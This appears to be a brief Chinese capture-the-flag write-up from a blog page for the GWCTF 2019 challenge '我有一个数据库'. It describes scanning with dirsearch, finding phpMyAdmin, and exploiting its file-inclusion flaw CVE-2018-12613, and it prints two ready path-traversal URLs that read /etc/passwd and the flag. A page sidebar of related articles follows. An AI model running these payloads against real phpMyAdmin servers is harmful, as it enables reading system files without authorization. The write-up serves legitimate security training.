[GWCTF 2019]我有一个数据库

双层小牛堡2023-09-12 23:45

过来毛都没有

直接dirsearch 扫一下

发现存在 phpadmin 我们直接访问一下

啥都没有 但是给我们了 phpadmin的版本

我们去搜搜看是否存在漏洞

phpMyAdmin 4.8.1后台文件包含漏洞(CVE-2018-12613)_phpmyadmin cve-2018-12613漏洞获取webshell_zhang三的博客-CSDN博客

发现还真有 我们直接复现即可

复制代码 
/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd
复制代码 
phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../flag
相关推荐
小李是个程序3 小时前
登录与登录校验:Web安全核心解析
java·spring·web安全·jwt·cookie
athink_cn4 小时前
HTTP/2新型漏洞“MadeYouReset“曝光:可发动大规模DoS攻击
网络·网络协议·安全·http·网络安全
zzc9214 小时前
TLSv1.2协议与TCP/UDP协议传输数据内容差异
网络·测试工具·安全·wireshark·ssl·密钥·tlsv1.2
huluang6 小时前
医院网络安全重保行动方案
网络·安全
九州ip动态6 小时前
如何安全使用改IP软件更改异地IP地址?
网络·tcp/ip·安全
杭州泽沃电子科技有限公司6 小时前
告别翻山越岭!智能监拍远程守护输电线路安全
运维·人工智能·科技·安全
wha the fuck4048 小时前
攻防世界—unseping(反序列化)
安全·序列化和反序列化
David WangYang11 小时前
基于 IOT 的安全系统,带有使用 ESP8266 的语音消息
物联网·安全·语音识别
合作小小程序员小小店12 小时前
SDN安全开发环境中常见的框架,工具,第三方库,mininet常见指令介绍
python·安全·生成对抗网络·网络安全·网络攻击模型
数据智能老司机13 小时前
实现逆向工程——汇编指令演练
安全·逆向·汇编语言
热门推荐
01UV安装并设置国内源02Qwen3-Coder 快速上手教程 | Qwen Code + Claude Code03KGG转MP3工具|非KGM文件|解密音频04【2025.08.06最新版】Android Studio下载、安装及配置记录(自动下载sdk)052025最新国内服务器可用docker源仓库地址大全(2025年8月更新)06蜘蛛磁力 搜索引擎大全,如何使用蜘蛛磁力查找磁力链接07NVIDIA显卡驱动、CUDA、cuDNN 和 TensorRT 版本匹配指南08TRAE 规则(Rules)配置指南:个人习惯、团队规范与最佳实践09阿里开源首个图像生成基础模型——Qwen-Image本地部署教程,超强中文渲染能力刷新SOTA!10TRAE Rules 实践:为项目配置 6A 工作流